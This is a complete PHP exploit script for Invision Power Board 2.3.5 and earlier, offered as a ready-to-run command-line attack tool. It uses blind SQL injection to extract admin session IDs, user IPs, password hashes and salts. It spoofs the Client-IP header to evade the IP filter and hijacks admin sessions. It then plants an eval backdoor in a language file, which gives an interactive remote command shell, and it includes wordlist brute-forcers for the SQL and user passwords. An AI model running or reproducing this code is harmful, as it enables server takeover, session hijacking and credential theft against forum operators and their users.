#!/usr/bin/php -q <?php # This file requires the PhpSploit class. # If you want to use this class, the latest # version can be downloaded from acid-root.new.fr. ################################################## error_reporting(E_ALL ^ E_NOTICE); require('phpsploitclass.php'); # yeah ... it rox (: class ipb_spl { var $web; function main() { $this->mhead(); # Gimme your args $this->p_attack = $this->get_p('attack', true); $this->p_prox = $this->get_p('proxhost'); $this->p_proxa = $this->get_p('proxauth'); $this->init_global(); # Proxy params if( $this->p_prox ) { $this->web->proxy($this->p_prox); if( $this->p_proxa ) $this->web->proxyauth($this->p_proxa); } # Where do we go ? switch( $this->p_attack ) { case 1: $this->code_exec(); break; case 2; $this->bf_sql_pwd(); break; case 3: $this->bf_usr_pwd(); break; default: $this->usage(); } return; } function code_exec($loop=1) { # First loop if( $loop == 1 ) { $this->set_sql_param(); $this->set_sql_focus(); $this->p_acp = $this->get_p('acp'); # ACP path if( !$this->p_acp ) { # If the user changed the ACP directory, we can # find it (if the "Remove ACP Link" option was not # applied) by log in as an Admin, and then click # on "Admin CP". This can be done with a user # but I didn't implemented that ;) $this->msg('Using default ACP path: admin', 1); $this->p_acp = 'admin'; } else $this->msg('Using ACP path "'.$this->p_acp.'"', 1); # Init client headers: # Only if we have the same IP as the targeted user (not admin), # it resets session datas, so we try to spoof our # IP as a random one in order to keep user's session datas while # we bruteforce SQL fields. $this->bypass_matches(); # Remove expired sessions ( time() - 60*60*2 = > 2 hours ) $this->web->get($this->p_url.$this->p_acp.'/index.php?'); $this->msg('Removed all out of date admin sessions', 1); # Cookie prefix $this->get_cprefix(); } # Admin session ? $this->msg('Trying to find an admin session id', 0); # Got one :] if( $this->get_admin_sess() ) { $this->s_admin = true; $this->s_sess = $this->data['a_sess_id']; $this->a_url = $this->p_url.$this->p_acp.'/index.php?adsess='.$this->s_sess; } # Nothing special else { $this->s_admin = false; $this->msg('No admin session id found', -1); } # User session ? if( !$this->s_sess ) { $this->msg('Trying to find a user session id', 0); # Yep if( $this->get_user_sess() ) $this->s_sess = $this->data['u_sess_id']; # F0ck else { $this->msg('No user session id found', -1); $this->msg('Admin session > 2 hours or user logged out', 0); $this->msg('Keeping trying until the user connects', 0); $this->msg('Entering loop #'.$loop.' ...', 0); $this->code_exec(++$loop); } } $this->msg('Getting security options', 0); # Security options $this->get_sec_options(); # IP filter ? if( $this->conf['ip'] === '1' ) { $this->s_bypass = true; $this->msg('IP filter option is turned on', 0); # Spoofing protection ? if( !$this->conf['xforward'] ) { # Assuming our IP isn't the same etc.. $this->msg('Can\'t bypass the IP filter', -1); exit(1); } # X-Forwarded-For / Client-IP / # Proxy-User / X-Cluster-Client-IP else { $this->msg('Cool, we can spoof our IP (Client-IP)', 1); if( $this->s_admin ) { $this->msg('Trying to find admin\'s last IP', 0); # Admin IP found $this->get_admin_ip(); $this->s_ip = $this->data['a_ip_addr']; } else { $this->s_admin = false; $this->msg('Trying to find user\'s last used IP', 0); # User IP found $this->get_user_ip(); $this->s_ip = $this->data['u_ip_addr']; } # Nothing found if( !$this->s_ip ) { # Ahah (: $this->msg('No IP found for this user', -1); $this->give_hope(); } # Got one ! else $this->msg('Ok, using IP '.$this->s_ip, 1); } } # User-Agent filter ? if( $this->conf['browser'] === '1' && !$this->s_admin ) { $this->s_bypass = true; $this->msg('Trying to find a valid user-agent', 0); # Good if( $this->get_user_agent() ) { $this->msg('Ok, using user-agent '.substr($this->data['u_agent'], 0, 10).'...', 1); $this->s_agent = $this->data['u_agent']; } # WTF :! else { $this->msg('No user-agent found for this user', -1); $this->msg('Maybe the browser didn\'t send this header', 0); $this->s_agent = ''; } } # Cool !? if( !$this->s_bypass ) $this->msg('Cool, nothing to bypass', 1); $this->msg('Trying to log in', 0); # Owned =] if( $this->is_logged() ) { # PHP code if( $this->s_admin ) { $this->msg('Logged in with an admin session', 1); $this->exec_code(); } # Normal user ? else { $this->msg('Logged in with a user session', 1); $this->msg('You can log in using the cookie session_id', 1); if( $this->s_ip !== $this->def_ip ) $this->msg('Set the Client-IP header to: '.$this->s_ip, 1); if( $this->s_agent ) $this->msg('Set the User-Agent header to: '.$this->s_agent, 1); exit(0); } } else { # Even if the admin logged out .. the admin session # is still valid ;) $this->msg('Can\'t log in, the session has expired ?!', -1); $this->give_hope(); } return; } function bf_sql_pwd() { $this->p_ip = $this->get_p('ip', true); $this->p_dict = $this->get_p('dict', true); $this->p_sql_u = $this->get_p('sqlusr'); $this->p_url = $this->get_p('url'); $this->p_uname = $this->get_p('uname'); $this->p_pwd = $this->get_p('pwd'); // or $this->p_uid = $this->get_p('uid'); $this->p_hash = $this->get_p('passhash'); $this->p_shold = $this->get_p('stronghold'); if( $this->p_uname && $this->p_pwd && $this->p_url ) { $this->get_cprefix(); $this->msg('Trying to get some cookies', 0); $g_dat = 'index.php?act=Login&CODE=01&CookieDate=1'; $p_dat = 'UserName='.$this->p_uname.'&PassWord='.$this->p_pwd.'&x=0&y=0'; $this->web->post($this->p_url.$g_dat, $p_dat); $this->p_uid = $this->web->cookie[$this->s_cprefix.'member_id']; $this->p_hash = $this->web->cookie[$this->s_cprefix.'pass_hash']; $this->p_shold = $this->web->cookie[$this->s_cprefix.'ipb_stronghold']; } elseif( !$this->p_uid || !$this->p_hash || !$this->p_shold ) $this->usage(); if( !$this->p_uid || !$this->p_hash || !$this->p_shold ) { $this->msg('Can\'t get cookies', -1); $this->msg('You should try with other parameters', -1); exit(1); } $this->msg('Ok, using cookies:', 1); $this->msg('member_id='.$this->p_uid, 1); $this->msg('pass_hash='.$this->p_hash, 1); $this->msg('ipb_stronghold='.$this->p_shold, 1); if( !$this->p_sql_u ) { $this->set_sql_param(); $this->msg('Trying to get the current sql user', 0); if( !$this->get_sql_user() ) { $this->msg('Can\'t get the sql user', -1); $this->msg('If you know the sql user, use -sqlusr', -1); exit(1); } else $this->p_sql_u = $this->data['sql_user']; } $this->msg('Ok, using sql user '.$this->p_sql_u, 1); $dico_c = file($this->p_dict); $ip_a = explode('.', $this->p_ip); $this->msg('Entering local dictionnary attack ('.count($dico_c).' words)', 0); $this->msg('You should take a drink ...', 0); foreach( $dico_c as $line ) { $md5 = md5(trim($line).$this->p_sql_u); $md5 = md5($this->p_uid.'-'.$ip_a[0].'-'.$ip_a[1].'-'.$this->p_hash).$md5; $md5 = md5($md5); if( $this->p_shold === $md5 ) { $this->msg('Found something cool =]', 1); $this->msg('SQL password: '.$line, 1); exit(1); } } $this->msg('End of the wordlist, password not found', -1); return; } function bf_usr_pwd() { $this->p_dict = $this->get_p('dict', true); $this->p_hash = $this->get_p('passhash'); $this->p_salt = $this->get_p('salt'); if( !$this->p_hash || !$this->p_salt ) { $this->set_sql_param(); $this->set_sql_focus(); } if( !$this->p_hash ) { $this->msg('Trying to get the password hash', 0); if( !$this->get_pass_hash() ) { $this->msg('Can\'t get the password hash', -1); exit(1); } else $this->p_hash = $this->data['pass_hash']; } $this->msg('Ok, using hash '.$this->p_hash, 1); if( !$this->p_salt ) { $this->msg('Trying to get the password salt', 0); if( !$this->get_pass_salt() ) { $this->msg('Can\'t get the password salt', -1); exit(1); } else $this->p_salt = $this->data['pass_salt']; } $this->msg('Ok, using salt '.$this->p_salt, 1); $dico_c = file($this->p_dict); $this->msg('Entering local dictionnary attack ('.count($dico_c).' words)', 0); $this->msg('You should take a drink ...', 0); foreach( $dico_c as $line ) { if( $this->p_hash === md5(md5($this->p_salt).md5(trim($line))) ) { $this->msg('Found something cool =]', 1); $this->msg('User password: '.$line, 1); exit(1); } } $this->msg('End of the wordlist, password not found', -1); return; } function set_sql_param() { $this->p_url = $this->get_p('url', true); $this->p_pre = $this->get_p('prefix'); # Table prefix if( !$this->p_pre ) { # Default table prefix if not precised $this->msg('Using default table prefix: ibf_', 1); $this->p_pre = 'ibf_'; } else $this->msg('Using table prefix '.$this->p_pre, 1); } function set_sql_focus() { $this->p_uname = $this->get_p('uname'); $this->p_uid = $this->get_p('uid'); if( $this->p_uname ) $this->msg('Using targeted username '.$this->p_uname, 1); elseif( $this->p_uid ) $this->msg('Using targeted user id '.$this->p_uid, 1); # Target if( !($this->p_uname || $this->p_uid) ) { # Default uid if not precised $this->msg('Using default user id: 1', 1); $this->p_uid = 1; } # Focus on ? if( $this->p_uname ) $this->t_on = 'members_l_username=\''.addslashes($this->p_uname).'\''; else $this->t_on = 'id='.(int)$this->p_uid; return; } function exec_code() { $this->write_code(); while( $this->cmd_prompt() ) { $this->web->addheader('My-Code', $this->cmd); $this->web->get($this->p_url); print "\n".$this->get_answer(); } exit(0); } function get_answer() { $res_a = explode($this->res_sep, $this->web->getcontent()); if( !$res_a[1] ) return 'No result to retrieve'; else return $res_a[1]; } function cmd_prompt() { $this->cmd = $this->msg('root@ipb: ', 1, 1, 0, true); if( !ereg('^(quit|exit)$', $this->cmd) ) { $this->cmd = base64_encode($this->cmd); $this->cmd = str_replace('%CMD%', $this->cmd, $this->php_send); return TRUE; } else return FALSE; } function write_code() { # Gimme the language ID $this->get_def_lang(); # Current lang settings $p_dat = 'code=edit2&act=lang&id='.$this->g_lid.'§ion'. '=lookandfeel&lang_file=lang_boards.php'; $this->web->post($this->a_url, $p_dat); # We collect each variable name / value if( preg_match_all($this->reg_lvar, $this->web->getcontent(), $l_vars) ) { # POST data $p_dat = 'code=doedit&act=lang&id='.$this->g_lid. '&lang_file=lang_boards.php§ion=lo'. 'okandfeel&'; # &Name=Value for( $i=0; $i<count($l_vars[0]); $i++ ) { $p_dat .= '&XX_'.$l_vars[1][$i].'='.urlencode($l_vars[2][$i]); # We write our PHP code in the first variable if( $i == 0 ) $p_dat .= $this->php_write; } # Go on $this->web->post($this->a_url, $p_dat); $this->msg('PHP code written', 1); } else { # WTF :! $this->msg('Can\'t find block variables', 0); exit(1); } return; } function get_def_lang() { $this->msg('Trying to get the set language id', 0); $this->web->get($this->a_url.'§ion=lookandfeel&act=lang'); if( preg_match($this->reg_lang, $this->web->getcontent(), $lids) ) { $this->g_lid = $lids[1]; $this->msg('Using language id '.$this->g_lid, 1); } else { $this->msg('Can\'t get the default language id', -1); exit(1); } return; } function is_logged() { $this->bypass_matches(); # User session ok ? if( !$this->s_admin ) { $match = 'act=Login&CODE=03'; $this->web->addcookie($this->s_cprefix.'session_id', $this->s_sess); $this->web->get($this->p_url); } # Admin session ok ? else { $match = '§ion='; $this->web->get($this->a_url); } if( preg_match("/$match/i", $this->web->getcontent()) ) return true; else return false; } function bypass_matches() { # match_browser $this->web->agent($this->s_agent); # match_ipaddress $this->web->addheader('Client-IP', $this->s_ip); return; } function get_cprefix() { $this->msg('Trying to get the cookie prefix', 0); # Set-Cookie: session_id=...; path=/ $this->web->get($this->p_url); $this->s_cprefix = ''; if( $this->web->cookie ) { foreach( $this->web->cookie as $name => $value) { if( preg_match($this->reg_cpre, $name, $cmatches) ) { $this->s_cprefix = $cmatches[1]; break; } } } if( !$this->s_cprefix ) $this->msg('No cookie prefix set', 1); else $this->msg('Using cookie prefix '.$this->s_cprefix, 1); return; } function get_sec_options() { # If no value, take the default one $this->get_conf('t.conf_value'); $this->get_conf('t.conf_default'); return; } function get_conf($field) { $this->init_sql(); $this->t_table = 'conf_settings'; $this->t_field = $field; $this->t_char = $this->chr_num; $this->t_add_0 = "AND t.conf_key='match_browser'"; if( $this->conf['browser'] === '' ) $this->conf['browser'] = $this->bf_inj(); $this->t_add_0 = "AND t.conf_key='match_ipaddress'"; if( $this->conf['ip'] === '' ) $this->conf['ip'] = $this->bf_inj(); $this->t_add_0 = "AND t.conf_key='xforward_matching'"; if( $this->conf['xforward'] === '' ) $this->conf['xforward'] = $this->bf_inj(); return; } function get_login_key() { $this->init_sql(); $this->t_key = 'login_key'; $this->t_table = 'members'; $this->t_field = 't.member_login_key'; $this->t_join = 't.id=m.id'; $this->t_char = $this->chr_md5; $this->data['login_key'] = $this->bf_inj(); return $this->key_val; } function get_sql_user() { $this->init_sql(); $this->t_key = 'user()'; $this->t_table = 'members'; $this->t_field = 'user()'; $this->t_char = $this->chr_all; $this->t_end = '@'; $this->data['sql_user'] = $this->bf_inj(); return $this->key_val; } function get_pass_hash() { $this->init_sql(); $this->t_key = 'pass_hash'; $this->t_table = 'members_converge'; $this->t_field = 't.converge_pass_hash'; $this->t_join = 't.converge_email=m.email'; $this->t_char = $this->chr_md5; $this->data['pass_hash'] = $this->bf_inj(); return $this->key_val; } function get_pass_salt() { $this->init_sql(); $this->t_key = 'pass_salt'; $this->t_table = 'members_converge'; $this->t_field = 't.converge_pass_salt'; $this->t_join = 't.converge_email=m.email'; $this->t_char = $this->chr_all; $this->data['pass_salt'] = $this->bf_inj(); return $this->key_val; } function get_admin_sess() { $this->init_sql(); $this->t_key = 'admin_sid'; $this->t_table = 'admin_sessions'; $this->t_field = 't.session_id'; $this->t_join = 't.session_member_id=m.id'; $this->t_sel = 't.session_log_in_time'; $this->t_char = $this->chr_md5; $this->data['a_sess_id'] = $this->bf_inj(); return $this->key_val; } function get_admin_ip() { $this->init_sql(); $this->t_key = 'admin_ip'; $this->t_table = 'admin_sessions'; $this->t_field = 't.session_ip_address'; $this->t_join = 't.session_member_id=m.id'; $this->t_sel = 't.session_log_in_time'; $this->t_char = $this->chr_ip; $this->data['a_ip_addr'] = $this->bf_inj(); return $this->key_val; } function get_admin_pwd() { $this->init_sql(); $this->t_key = 'admin_pwd'; $this->t_table = 'admin_login_logs'; $this->t_field = 't.admin_post_details'; $this->t_join = 't.admin_username=m.members_l_username'; $this->t_sel = 't.admin_id'; $this->t_end = '"'; $this->t_bchar = -4; # ";}} $this->t_char = $this->chr_all; $this->data['a_pwd_like']= $this->bf_inj(); return $this->key_val; } function get_user_sess() { $this->init_sql(); $this->t_key = 'user_sid'; $this->t_table = 'sessions'; $this->t_field = 't.id'; $this->t_join = 't.member_id=m.id'; $this->t_sel = 't.running_time'; $this->t_char = $this->chr_md5; $this->data['u_sess_id'] = $this->bf_inj(); return $this->key_val; } function get_user_ip() { $this->init_sql(); $this->t_key = 'user_ip'; $this->t_table = 'sessions'; $this->t_field = 't.ip_address'; $this->t_join = 't.member_id=m.id'; $this->t_sel = 't.running_time'; $this->t_char = $this->chr_ip; $this->data['u_ip_addr'] = $this->bf_inj(); return $this->key_val; } function get_user_agent() { $this->init_sql(); $this->t_key = 'user_agent'; $this->t_table = 'sessions'; $this->t_field = 't.browser'; $this->t_join = 't.member_id=m.id'; $this->t_sel = 't.running_time'; $this->t_char = $this->chr_all; $this->data['u_agent'] = $this->bf_inj(); return $this->key_val; } function init_sql() { # SQL Injection params $this->t_end = null; $this->t_add_0 = ''; $this->t_add_1 = ''; $this->t_sel = '1'; $this->t_bchar = 0; $this->t_join = ''; $this->t_key = ''; $this->t_add_1 = 'ORDER BY id DESC LIMIT 1'; return; } function init_global() { # Charsets $this->chr_spe = str_split(' :/;*(-.!,?§*µù%$£^¨=+})°]àç^_\\`è|[\'{#é~&²"@'); $this->chr_num = range(0, 9); $this->chr_md5 = array_merge( $this->chr_num, range('a', 'f') ); $this->chr_ip = array_merge( $this->chr_num, array('.') ); $this->chr_all = array_merge( $this->chr_num, range('a', 'z') ); $this->chr_all = array_merge( range('A', 'Z'), $this->chr_all, $this->chr_spe ); # SQL Injection $this->def_param = 'index.php?s=&act=xmlout&do=check-display-name&name=%rep_inj%'; $this->def_inj = "' OR 1=\"'\" UNION %rep_req% OR 1=\"'\" %rep_add% #"; # Results $this->data = array(); $this->conf = array('ip' => '', 'browser' => '', 'xforward' => ''); # Misc $this->stat = array(-1 => '-', 0 => '/', 1 => '+'); $this->s_bypass = false; $this->res_sep = md5(rand()); $this->def_ip = rand(0,255).'.'.rand(0,255).'.'.rand(0,255).'.'.rand(0,255); # PHP Code $this->php_write = '${${@eval($_SERVER[HTTP_MY_CODE])}}'; $this->php_send = "print('$this->res_sep');@system(base64_decode('%CMD%'));"; $this->php_send .= "print('$this->res_sep');exit(0);"; # Regex $this->reg_lang = '#</span></td>[\r\n]*.*[\r\n]*.*code=export&id=([0-9]+)#i'; $this->reg_lvar = "#id='XX_([\w]+)'[\x20]+class='multitext'>(.*)</textarea></td>#i"; $this->reg_cpre = '#^(.*)session_id$#'; # $this->reg_acp = '#<a href="(.*)"[\x20]+target="_blank"#i'; # Default client headers $this->s_agent = 'Mozilla Firefox'; $this->s_ip = $this->def_ip; return; } function bf_inj() { $this->sub_chr = $this->t_bchar; $this->key_val = ''; if( !empty($this->t_key) ) $this->msg('', 0); while( true ) { if( $this->t_bchar < 0 ) $this->sub_chr--; else $this->sub_chr++; # 0-9a-f for( $j=0;$j<=count($this->t_char);$j++ ) { # That one ? $chr = $this->t_char[$j]; # Latest char ? if( $j === count($this->t_char) ) $chr = $this->t_end; # Ascii num $asc = ord($chr); # Screen bug if( !empty($this->t_key) ) { $msg = $this->t_key.'='.$this->key_val; $msg .= ($chr === $this->t_end ? "\x20" : $chr); $this->msg($msg, 0, 1, 1); } # Focus on the target ? if( !empty($this->t_join) ) { $inj = 'SELECT 1,'.$this->t_sel.' FROM '.$this->p_pre.$this->t_table. ' t, '.$this->p_pre.'members m WHERE '.$this->t_join. ' AND m.'.$this->t_on.' AND ASCII(SUBSTR('.$this->t_field. ','.$this->sub_chr.',1))='.$asc.' '.$this->t_add_0; } else { $inj = 'SELECT 1,'.$this->t_sel.' FROM '.$this->p_pre.$this->t_table. ' t WHERE ASCII(SUBSTR('.$this->t_field.','.$this->sub_chr. ',1))='.$asc.' '.$this->t_add_0; } # SQL Injection via rawurldecode() $inj = str_replace('%rep_req%', $inj, $this->def_inj); $inj = str_replace('%rep_add%', $this->t_add_1, $inj); $inj = str_replace(array('"', "'"), array('%2522', '%2527'), $inj); # Params $inj = str_replace('%rep_inj%', $inj, $this->def_param); $inj = str_replace(array(' ', '#'), array('%20', '%23'), $inj); $this->web->get($this->p_url.$inj); # Ok !? if( !strstr($this->web->getcontent(), 'notfound') ) { if( $chr !== $this->t_end ) { $this->key_val .= $chr; break; } } # End if( $chr === $this->t_end ) { # Reverse if( $this->t_bchar < 0 ) $this->key_val = strrev($this->key_val); if( !empty($this->t_key) ) $this->msg($this->t_key.'='.$this->key_val, 1, 1, 1); return $this->key_val; } } } } function get_p($p, $exit=false) { global $argv; foreach( $argv as $key => $value ) { if( $value === '-'.$p ) { if( isset($argv[$key+1]) && !empty($argv[$key+1]) ) { return $argv[$key+1]; } else { if( $exit ) $this->usage(); return true; } } } if( $exit ) $this->usage(); return false; } function msg($msg, $nstatus, $nspace=1, $ndel=0, $ask=false) { if( $ndel ) $type = "\r"; else $type = "\n"; # wtf (: print ( $type.str_repeat("\x20", $nspace). $this->stat[$nstatus]."\x20".$msg ); if( $ask ) return trim(fgets(STDIN)); } function give_hope() { $this->msg('You should try with another user or try another time', -1); exit(1); } function mhead() { # Advisory: http://acid-root.new.fr/?0:18 print "\n Invision Power Board <= 2.3.5 Multiple Vulnerabilities"; print "\n ------------------------------------------------------"; print "\n\n About:"; print "\n\n by DarkFig < gmdarkfig (at) gmail (dot) com >"; print "\n http://acid-root.new.fr/"; print "\n #acidroot@xxxxxxxxxxxxxxxx"; print "\n\n\n Attack(s):\n"; return; } function usage() { print "\n -attack <int_choice> <params> [options]\n\n"; print " 1 - PHP code execution\n\n"; print " -url IPB url with ending slash\n\n"; print " -uname targeted username\n"; print " -uid OR the targeted user id (def: 1)\n\n"; print " -prefix sql table prefix (def: ibf_)\n"; print " -acp admin control panel path (def: admin)\n\n\n"; print " 2 - Insecure SQL password usage\n\n"; print " -ip your current IP\n"; print " -dict a wordlist file\n\n"; print " -url IPB url with ending slash\n"; print " -uname a valid member username\n"; print " -pwd the associated password\n\n"; print " -uid OR the targeted member id\n"; print " -passhash the passhash cookie value\n"; print " -stronghold the stronghold cookie value\n\n"; print " -sqlusr you can precise the sql user\n"; print " -prefix sql table prefix (def: ibf_)\n\n\n"; print " 3 - Password bruteforcer\n\n"; print " -dict a wordlist file\n\n"; print " -url IPB url with ending slash\n"; print " -uname targeted username\n"; print " -uid OR the targeted user id (def: 1)\n"; print " -prefix sql table prefix (def: ibf_)\n\n"; print " -passhash OR the passhash value\n"; print " -salt the salt value\n\n\n"; print " Optional: \n\n"; print " -proxhost <ip> if you wanna use a proxy\n"; print " -proxauth <usr:pwd> proxy with authentication\n"; exit(1); } } $web = new phpsploit; $web->cookiejar(1); $web->agent('Mozilla Firefox'); $ipb = new ipb_spl; $ipb->web =& $web; $ipb->main(); ?>